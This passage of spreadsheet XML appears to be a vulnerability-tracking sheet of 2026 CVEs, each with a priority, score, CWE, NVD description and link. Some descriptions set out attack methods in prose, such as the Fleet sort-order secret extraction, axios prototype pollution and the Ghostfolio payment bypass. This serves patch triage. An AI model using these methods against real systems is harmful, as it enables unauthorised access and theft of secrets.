        </is>
      </c>
      <c r="L3845" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Samba’s vfs_worm module. The module is intended to provide write-once, read-many (WORM) protections by preventing modification of files after a configurable grace period. Due to insufficient validation during rename operations, an authenticated user with write access to a share could overwrite a protected file by renaming a newly created file over the existing WORM-protected file.</t>
        </is>
      </c>
      <c r="M3845" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-2340</t>
        </is>
      </c>
    </row>
    <row r="3846">
      <c r="A3846" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3846" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-2377</t>
        </is>
      </c>
      <c r="C3846" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3846" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3846" s="5" t="inlineStr"/>
      <c r="F3846" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3846" s="5" t="inlineStr">
        <is>
          <t>red hat</t>
        </is>
      </c>
      <c r="H3846" s="5" t="inlineStr">
        <is>
          <t>redhat:mirror_registry_for_red_hat_openshift, redhat:quay</t>
        </is>
      </c>
      <c r="I3846" s="5" t="inlineStr">
        <is>
          <t>2026-04-08</t>
        </is>
      </c>
      <c r="J3846" s="5" t="inlineStr"/>
      <c r="K3846" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3846" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in Red Hat Quay and mirror registry for Red Hat OpenShift. The log export feature in these products allows an authenticated user to specify an arbitrary callback URL. A backend process then makes server-side HTTP requests to this provided URL. This vulnerability, known as Server-Side Request Forgery (SSRF), could allow an attacker to send requests from the application's internal network, potentially leading to the disclosure of sensitive information.</t>
        </is>
      </c>
      <c r="M3846" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-2377</t>
        </is>
      </c>
    </row>
    <row r="3847">
      <c r="A3847" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3847" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27145</t>
        </is>
      </c>
      <c r="C3847" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3847" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3847" s="5" t="inlineStr"/>
      <c r="F3847" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G3847" s="5" t="inlineStr"/>
      <c r="H3847" s="5" t="inlineStr"/>
      <c r="I3847" s="5" t="inlineStr">
        <is>
          <t>2026-06-02</t>
        </is>
      </c>
      <c r="J3847" s="5" t="inlineStr"/>
      <c r="K3847" s="5" t="inlineStr">
        <is>
          <t>CWE-606</t>
        </is>
      </c>
      <c r="L3847" s="5" t="inlineStr">
        <is>
          <t>(*x509.Certificate).VerifyHostname previously called matchHostnames in a loop over all DNS Subject Alternative Name (SAN) entries. This caused strings.Split(host, ".") to execute repeatedly on the same input hostname. With a large DNS SAN list, verification costs scaled quadratically based on the number of SAN entries multiplied by the hostname's label count. Because x509.Verify validates hostnames before building the certificate chain, this overhead occurred even for untrusted certificates.</t>
        </is>
      </c>
      <c r="M3847" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27145</t>
        </is>
      </c>
    </row>
    <row r="3848">
      <c r="A3848" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3848" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33217</t>
        </is>
      </c>
      <c r="C3848" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3848" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3848" s="5" t="inlineStr"/>
      <c r="F3848" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3848" s="5" t="inlineStr"/>
      <c r="H3848" s="5" t="inlineStr">
        <is>
          <t>linuxfoundation:nats-server</t>
        </is>
      </c>
      <c r="I3848" s="5" t="inlineStr">
        <is>
          <t>2026-03-25</t>
        </is>
      </c>
      <c r="J3848" s="5" t="inlineStr"/>
      <c r="K3848" s="5" t="inlineStr">
        <is>
          <t>CWE-425, CWE-863</t>
        </is>
      </c>
      <c r="L3848" s="5" t="inlineStr">
        <is>
          <t>NATS-Serve</t>
        </is>
      </c>
      <c r="M3848" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33217</t>
        </is>
      </c>
    </row>
    <row r="3849">
      <c r="A3849" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3849" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-34836</t>
        </is>
      </c>
      <c r="C3849" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3849" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3849" s="5" t="inlineStr"/>
      <c r="F3849" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3849" s="5" t="inlineStr"/>
      <c r="H3849" s="5" t="inlineStr"/>
      <c r="I3849" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J3849" s="5" t="inlineStr"/>
      <c r="K3849" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3849" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, improper access control in ajax.render.php and ajax.document.php allows for document access without checking on user permissions. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="M3849" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-34836</t>
        </is>
      </c>
    </row>
    <row r="3850">
      <c r="A3850" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3850" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-34949</t>
        </is>
      </c>
      <c r="C3850" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3850" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3850" s="5" t="inlineStr"/>
      <c r="F3850" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3850" s="5" t="inlineStr"/>
      <c r="H3850" s="5" t="inlineStr"/>
      <c r="I3850" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J3850" s="5" t="inlineStr"/>
      <c r="K3850" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L3850" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool.Prior to 3.2.3, an unauthenticated user could delete the .readonly file on iTop instances — a file created during the setup process that prevents users from performing write actions. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="M3850" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-34949</t>
        </is>
      </c>
    </row>
    <row r="3851">
      <c r="A3851" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3851" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-37009</t>
        </is>
      </c>
      <c r="C3851" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3851" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3851" s="5" t="inlineStr"/>
      <c r="F3851" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3851" s="5" t="inlineStr"/>
      <c r="H3851" s="5" t="inlineStr"/>
      <c r="I3851" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J3851" s="5" t="inlineStr"/>
      <c r="K3851" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L3851" s="5" t="inlineStr">
        <is>
          <t>A SQL injection vulnerability in NL2SQLTool in crewai-tools v1.10.2rc1 allows a remote attacker to execute arbitrary SQL commands via an unsanitized sql_query argument.</t>
        </is>
      </c>
      <c r="M3851" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-37009</t>
        </is>
      </c>
    </row>
    <row r="3852">
      <c r="A3852" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3852" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38343</t>
        </is>
      </c>
      <c r="C3852" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3852" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3852" s="5" t="inlineStr"/>
      <c r="F3852" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3852" s="5" t="inlineStr"/>
      <c r="H3852" s="5" t="inlineStr"/>
      <c r="I3852" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J3852" s="5" t="inlineStr"/>
      <c r="K3852" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L3852" s="5" t="inlineStr">
        <is>
          <t>An integer overflow in the libavfilter/vf_scale.c component of FFmpeg N-122528-gdd2976b9e1 allows attackers to cause a Denial of Service (DoS) via supplying a crafted video file.</t>
        </is>
      </c>
      <c r="M3852" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38343</t>
        </is>
      </c>
    </row>
    <row r="3853">
      <c r="A3853" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3853" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38345</t>
        </is>
      </c>
      <c r="C3853" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3853" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3853" s="5" t="inlineStr"/>
      <c r="F3853" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3853" s="5" t="inlineStr"/>
      <c r="H3853" s="5" t="inlineStr"/>
      <c r="I3853" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J3853" s="5" t="inlineStr"/>
      <c r="K3853" s="5" t="inlineStr">
        <is>
          <t>CWE-369</t>
        </is>
      </c>
      <c r="L3853" s="5" t="inlineStr">
        <is>
          <t>A Division-by-Zero vulnerability in the ff_sws_init_single_context function (/libswscale/utils.c) of FFmpeg N-122528-gdd2976b9e1 allows attackers to cause a Denial of Service (DoS) via a crafted input.</t>
        </is>
      </c>
      <c r="M3853" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38345</t>
        </is>
      </c>
    </row>
    <row r="3854">
      <c r="A3854" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3854" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41607</t>
        </is>
      </c>
      <c r="C3854" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3854" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3854" s="5" t="inlineStr"/>
      <c r="F3854" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G3854" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H3854" s="5" t="inlineStr">
        <is>
          <t>apache:thrift</t>
        </is>
      </c>
      <c r="I3854" s="5" t="inlineStr">
        <is>
          <t>2026-04-28</t>
        </is>
      </c>
      <c r="J3854" s="5" t="inlineStr"/>
      <c r="K3854" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L3854" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds Read vulnerability in Apache Thrift.
This issue affects Apache Thrift: before 0.23.0.
Users are recommended to upgrade to version 0.23.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M3854" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41607</t>
        </is>
      </c>
    </row>
    <row r="3855">
      <c r="A3855" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3855" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42041</t>
        </is>
      </c>
      <c r="C3855" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3855" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3855" s="5" t="inlineStr"/>
      <c r="F3855" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G3855" s="5" t="inlineStr">
        <is>
          <t>java, node.js</t>
        </is>
      </c>
      <c r="H3855" s="5" t="inlineStr">
        <is>
          <t>axios:axios</t>
        </is>
      </c>
      <c r="I3855" s="5" t="inlineStr">
        <is>
          <t>2026-04-24</t>
        </is>
      </c>
      <c r="J3855" s="5" t="inlineStr"/>
      <c r="K3855" s="5" t="inlineStr">
        <is>
          <t>CWE-1321, CWE-287, CWE-915</t>
        </is>
      </c>
      <c r="L3855" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, the Axios library is vulnerable to a Prototype Pollution "Gadget" attack that allows any Object.prototype pollution to silently suppress all HTTP error responses (401, 403, 500, etc.), causing them to be treated as successful responses. This completely bypasses application-level authentication and error handling. The root cause is that validateStatus is the only config property using the mergeDirectKeys merge strategy, which uses JavaScript's in operator — an operator that inherently traverses the prototype chain. When Object.prototype.validateStatus is polluted with () =&gt; true, all HTTP status codes are accepted as success. This vulnerability is fixed in 1.15.1 and 0.31.1.</t>
        </is>
      </c>
      <c r="M3855" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42041</t>
        </is>
      </c>
    </row>
    <row r="3856">
      <c r="A3856" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3856" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42965</t>
        </is>
      </c>
      <c r="C3856" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3856" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3856" s="5" t="inlineStr"/>
      <c r="F3856" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3856" s="5" t="inlineStr"/>
      <c r="H3856" s="5" t="inlineStr">
        <is>
          <t>redhat:openshift_container_platform, redhat:openshift_router</t>
        </is>
      </c>
      <c r="I3856" s="5" t="inlineStr">
        <is>
          <t>2026-05-29</t>
        </is>
      </c>
      <c r="J3856" s="5" t="inlineStr"/>
      <c r="K3856" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3856" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the OpenShift Router. A user with EndpointSlice write access can exploit this vulnerability by creating a Service backed by an FQDN (Fully Qualified Domain Name) EndpointSlice that resolves to a cloud metadata endpoint. This allows the router to proxy requests to the cloud metadata endpoint, leading to the disclosure of instance credentials and other sensitive metadata. This bypasses previous security measures for validating IP addresses.</t>
        </is>
      </c>
      <c r="M3856" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42965</t>
        </is>
      </c>
    </row>
    <row r="3857">
      <c r="A3857" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3857" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44766</t>
        </is>
      </c>
      <c r="C3857" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3857" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3857" s="5" t="inlineStr"/>
      <c r="F3857" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3857" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="H3857" s="5" t="inlineStr"/>
      <c r="I3857" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3857" s="5" t="inlineStr"/>
      <c r="K3857" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L3857" s="5" t="inlineStr">
        <is>
          <t>SAP S/4HANA (Intercompany Matching and Reconciliation) allows a low-privileged authenticated user to inject malicious input into certain functions, which may be processed by the database without proper validation. This could allow the user to access sensitive information, resulting in high impact on confidentiality, with no impact on integrity and availability of the application.</t>
        </is>
      </c>
      <c r="M3857" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44766</t>
        </is>
      </c>
    </row>
    <row r="3858">
      <c r="A3858" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3858" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45377</t>
        </is>
      </c>
      <c r="C3858" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3858" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3858" s="5" t="inlineStr"/>
      <c r="F3858" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3858" s="5" t="inlineStr"/>
      <c r="H3858" s="5" t="inlineStr"/>
      <c r="I3858" s="5" t="inlineStr">
        <is>
          <t>2026-07-31</t>
        </is>
      </c>
      <c r="J3858" s="5" t="inlineStr"/>
      <c r="K3858" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-284</t>
        </is>
      </c>
      <c r="L3858" s="5" t="inlineStr">
        <is>
          <t>Decidim is a participatory democracy framework. Prior to 0.30.9, from 0.31.0 before 0.31.5, and in 0.32.0.rc1 before 0.32.0.rc2, the normal download_your_data flow requires the requester to be logged in as the export owner, but the resulting Active Storage blob redirect URL can be replayed without authentication by anyone who obtains it. This is because Decidim::DownloadYourDataController#download_file authenticates the export owner but redirects to a signed Active Storage blob URL that is no longer bound to the owner session. This issue is fixed in versions 0.30.9, 0.31.5, and 0.32.0.rc2.</t>
        </is>
      </c>
      <c r="M3858" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45377</t>
        </is>
      </c>
    </row>
    <row r="3859">
      <c r="A3859" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3859" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46370</t>
        </is>
      </c>
      <c r="C3859" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3859" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3859" s="5" t="inlineStr"/>
      <c r="F3859" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3859" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H3859" s="5" t="inlineStr"/>
      <c r="I3859" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J3859" s="5" t="inlineStr"/>
      <c r="K3859" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-89</t>
        </is>
      </c>
      <c r="L3859" s="5" t="inlineStr">
        <is>
          <t>Fleet is an open-source device management platform built on osquery. In versions up to and including 4.84.1, the labels host-listing endpoint (GET /api/v1/fleet/labels/{id}/hosts) allowed an authenticated user with the lowest-privilege Observer role to extract host enrollment secrets through a sort-order oracle. The endpoint accepted a user-supplied order_key parameter that was not validated against a column allowlist, so an attacker with Global or Team Observer access could set the sort column to a sensitive field such as h.node_key and combine it with the cursor-based after parameter to binary-search the value one character at a time; the targeted value never appeared in the response, but the presence or absence of results revealed each character. Because node_key and orbit_node_key are the long-lived shared secrets that osquery and Orbit agents use to authenticate to the Fleet server, an attacker who reconstructed them could impersonate enrolled hosts, submit fabricated query results and inventory, retrieve pending scripts and MDM commands, and poison compliance and policy results across the deployment. This issue is fixed in version 4.84.2.</t>
        </is>
      </c>
      <c r="M3859" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46370</t>
        </is>
      </c>
    </row>
    <row r="3860">
      <c r="A3860" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3860" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46371</t>
        </is>
      </c>
      <c r="C3860" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3860" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3860" s="5" t="inlineStr"/>
      <c r="F3860" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3860" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H3860" s="5" t="inlineStr"/>
      <c r="I3860" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J3860" s="5" t="inlineStr"/>
      <c r="K3860" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-89</t>
        </is>
      </c>
      <c r="L3860" s="5" t="inlineStr">
        <is>
          <t>Fleet is an open-source device management platform built on osquery. In versions up to and including 4.84.1, the Apple MDM commands listing endpoint (GET /api/v1/fleet/mdm/apple/commands) allowed an authenticated user with the lowest-privilege Observer role to extract sensitive values from joined database tables, including host enrollment secrets and Apple Push Notification Service tokens, through a sort-order oracle. The endpoint accepted a user-supplied order_key parameter that was not validated against a column allowlist, and because the underlying query joins the hosts and nano_enrollments tables, an attacker could set the sort column to a sensitive field and combine it with the cursor-based after parameter to binary-search the value one character at a time, with the presence or absence of results revealing each character even though the value never appeared in the response. With extracted node_key or orbit_node_key values an attacker could impersonate enrolled hosts to Fleet's osquery and Orbit endpoints, submit fabricated host data, and retrieve pending scripts and commands. This issue is fixed in version 4.84.2.</t>
        </is>
      </c>
      <c r="M3860" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46371</t>
        </is>
      </c>
    </row>
    <row r="3861">
      <c r="A3861" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3861" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47127</t>
        </is>
      </c>
      <c r="C3861" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3861" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3861" s="5" t="inlineStr"/>
      <c r="F3861" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3861" s="5" t="inlineStr"/>
      <c r="H3861" s="5" t="inlineStr"/>
      <c r="I3861" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J3861" s="5" t="inlineStr"/>
      <c r="K3861" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3861" s="5" t="inlineStr">
        <is>
          <t>Ghostfolio is an open source wealth management software. Prior to version 3.4.0, Ghostfolio's Stripe checkout success-URL handler at `GET /api/v1/subscription/stripe/callback?checkoutSessionId=&lt;id&gt;` retrieves the Stripe Checkout Session by ID and unconditionally grants a Premium subscription to the session's `client_reference_id` — without ever checking `session.payment_status` or `session.status`. There is no separate Stripe webhook endpoint with `stripe-signature` verification; this callback is the sole code path that creates Stripe-driven subscriptions. Any authenticated user can self-grant a 1-year Premium subscription without ever paying. Version 3.4.0 rejects sessions unless `session.payment_status === 'paid'` AND `session.status === 'complete'` (fails closed). Additionally, new unique `stripeCheckoutSessionId` column → a session can't be redeemed twice (race-safe via DB unique constraint).</t>
        </is>
      </c>
      <c r="M3861" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47127</t>
        </is>
      </c>
    </row>
    <row r="3862">
      <c r="A3862" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3862" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47226</t>
        </is>
      </c>
      <c r="C3862" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3862" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3862" s="5" t="inlineStr"/>
      <c r="F3862" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3862" s="5" t="inlineStr"/>
      <c r="H3862" s="5" t="inlineStr"/>
      <c r="I3862" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J3862" s="5" t="inlineStr"/>
      <c r="K3862" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="L3862" s="5" t="inlineStr">
        <is>
          <t>Admidio is an open-source user management solution. Prior to version 5.0.10, an authenticated Admidio member with upload rights on any one folder can permanently delete files from folders where they have only view access. The authorization check at the top of `modules/documents-files.php` evaluates upload rights against the attacker-supplied `folder_uuid` URL parameter — not the file's actual parent folder. The `file_delete` handler then only verifies view rights on the file's real location, never upload rights. By passing a folder they legitimately own in `folder_uuid` while targeting a file in a restricted folder via `file_uuid`, an attacker bypasses the upload-right check entirely and permanently deletes the file. This is an incomplete fix of GHSA-rmpj-3x5m-9m5f, which was patched in v5.0.7 but remains exploitable in v5.0.9. User should upgrade to v5.0.10 to receive an updated fix.</t>
        </is>
      </c>
      <c r="M3862" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47226</t>
        </is>
      </c>
    </row>
    <row r="3863">
      <c r="A3863" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3863" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47227</t>
        </is>
      </c>
      <c r="C3863" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3863" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3863" s="5" t="inlineStr"/>
      <c r="F3863" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3863" s="5" t="inlineStr"/>
      <c r="H3863" s="5" t="inlineStr"/>
      <c r="I3863" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J3863" s="5" t="inlineStr"/>
      <c r="K3863" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-863</t>
        </is>
      </c>
      <c r="L3863" s="5" t="inlineStr">
        <is>
          <t>Admidio is an open-source user management solution. `modules/categories.php` checks that the supplied `type` parameter (`ANN`, `EVT`, `ROL`, `USF`, …) corresponds to a module the actor administers. The follow-up "is this specific category editable by me" check at lines 56-61 is dead code because it compares `$getType` (a category-type code) against mode names (`edit`/`save`/`delete`); the condition is permanently false, so `$category-&gt;isEditable()` is never invoked. Prior to version 5.0.10, the `delete`, `sequence`, and `save` switch cases load the category by the supplied UUID and act on it without re-checking that the category belongs to a module the actor administers. A user holding only one module-administrator right can therefore destroy or reorder empty categories belonging to *other* modules — for example, an announcements administrator can delete role categories, profile-field categories, or weblink categories that they have no right to touch. Version 5.0.10 fixes the issue.</t>
        </is>
      </c>
      <c r="M3863" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47227</t>
        </is>
      </c>
    </row>
    <row r="3864">
      <c r="A3864" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3864" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47230</t>
        </is>
      </c>
      <c r="C3864" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3864" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3864" s="5" t="inlineStr"/>
      <c r="F3864" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3864" s="5" t="inlineStr"/>
      <c r="H3864" s="5" t="inlineStr"/>
      <c r="I3864" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J3864" s="5" t="inlineStr"/>
      <c r="K3864" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-863</t>
        </is>
      </c>
      <c r="L3864" s="5" t="inlineStr">
        <is>
          <t>Admidio is an open-source user management solution. Prior to version 5.0.10, `modules/documents-files.php` mode `file_rename_save` shares the same root-cause shape as the cross-folder move bug (`05-documents-cross-folder-move-idor.md`): the top-level rights check at lines 79-89 validates `hasUploadRight()` on the URL parameter `folder_uuid`, but the rename operation acts on `file_uuid` — a separate URL parameter — without re-checking the folder that actually contains the file. `DocumentsService::renameFile()` resolves the target file via `getFileForDownload()` (which permits view-readable files) but does not require upload right on the file's source folder. Result: a user with upload right on any folder A can rename a file in folder B as long as they can view it. They can also overwrite the file's description. Version 5.0.10 contains a fix.</t>
        </is>
      </c>
      <c r="M3864" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47230</t>
        </is>
      </c>
    </row>
    <row r="3865">
      <c r="A3865" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3865" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47233</t>
        </is>
      </c>
      <c r="C3865" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3865" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
